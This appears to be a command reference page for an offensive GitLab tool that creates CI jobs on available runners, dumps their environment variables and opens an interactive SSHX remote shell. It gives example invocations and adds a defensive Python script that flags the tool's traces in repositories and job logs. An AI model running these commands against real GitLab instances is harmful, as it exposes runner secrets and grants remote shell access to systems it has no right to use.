Exploit

pipeleak gl runners exploit

Create project with CI/CD jobs to exploit available runners

Synopsis

Creates a project, generates a job per available runner tag and runs a default .gitlab-ci.yml definition which can be customized for exploitation.

pipeleak gl runners exploit [flags]

Examples

# Creates a project with jobs for all available runners with the tags docker, shared. Dumps the envs encrypted using Age and starts an interactive SSHX shell.
pipeleak gl runners exploit --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --tags docker,shared --agePublicKey age1... --repoName my-exploit-repo --dry=false --shell=true

# Print the generated .gitlab-ci.yml only, does NOT create a project or jobs
pipeleak gl runners exploit --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --dry=true --shell=true

Options

      --agePublicKey string   An age public key generated with ./age-keygen -o key.txt (repo: https://github.com/FiloSottile/age). Prints the encrypted environment variables in the output log.
  -d, --dry                   Only generate and print the .gitlab-ci.yml, do NOT create real jobs
  -h, --help                  help for exploit
      --repoName string       The name for the created repository (default "pipeleak-runner-test")
  -s, --shell                 Add an SSHX interactive shell to the jobs (default true)
      --tags strings          Jobs with the following tags are created
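
For defenders reviewing a GitLab instance, the options above leave recognisable traces: the default repository name, an SSHX shell in the job definition, and age-encrypted output in the job log. The following triage check is an added example, not part of pipeleak or its documentation; the record layout, the assumed log formats (ASCII-armored age output, an sshx.io session link) and all sample data are constructed for illustration.

```python
import re

# Indicators taken from the options documented above. The log formats are
# assumptions: ASCII-armored age output and an sshx.io session link.
DEFAULT_REPO_NAME = "pipeleak-runner-test"  # default value of --repoName
AGE_ARMOR = re.compile(r"-----BEGIN AGE ENCRYPTED FILE-----")
SSHX_LINK = re.compile(r"https://sshx\.io/s/\S+")
SSHX_WORD = re.compile(r"\bsshx\b", re.IGNORECASE)


def review_project(project):
    """Return sorted finding labels for one project record.

    `project` is a hypothetical dict with "name", "ci_config", "job_logs".
    Only labels are returned, so session links are never copied into reports.
    """
    findings = set()
    if project["name"] == DEFAULT_REPO_NAME:
        findings.add("default-repo-name")
    if SSHX_WORD.search(project.get("ci_config", "")):
        findings.add("sshx-in-ci-config")
    for log in project.get("job_logs", []):
        if AGE_ARMOR.search(log):
            findings.add("age-payload-in-job-log")
        if SSHX_LINK.search(log):
            findings.add("sshx-link-in-job-log")
    return sorted(findings)


def triage(projects):
    """Map project name -> findings, omitting projects with none."""
    return {p["name"]: f for p in projects if (f := review_project(p))}


# Constructed sample records (not real projects, logs or links).
SAMPLE_PROJECTS = [
    {"name": "pipeleak-runner-test",
     "ci_config": "job-docker:\n  tags: [docker]\n  script:\n    - sshx\n",
     "job_logs": ["-----BEGIN AGE ENCRYPTED FILE-----\n<constructed>\n",
                  "Link: https://sshx.io/s/EXAMPLEID#EXAMPLEKEY\n"]},
    {"name": "web-frontend",
     "ci_config": "build:\n  script:\n    - npm ci\n",
     "job_logs": ["added 120 packages\n"]},
    {"name": "renamed-repo",  # --repoName changed, no shell in the job
     "ci_config": "job-shared:\n  tags: [shared]\n  script:\n    - ./run.sh\n",
     "job_logs": ["-----BEGIN AGE ENCRYPTED FILE-----\n<constructed>\n"]},
]

if __name__ == "__main__":
    for name, findings in triage(SAMPLE_PROJECTS).items():
        print(name, findings)
```

The third record shows why the repository name alone is a weak indicator: it changes with --repoName, while the encrypted payload in the job log remains.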

Options inherited from parent commands

      --coloredLog       Output the human-readable log in color (default true)
  -g, --gitlab string    GitLab instance URL
      --json             Use JSON as log output format
  -l, --logfile string   Log output to a file
  -t, --token string     GitLab API Token
  -v, --verbose          Verbose logging

SEE ALSO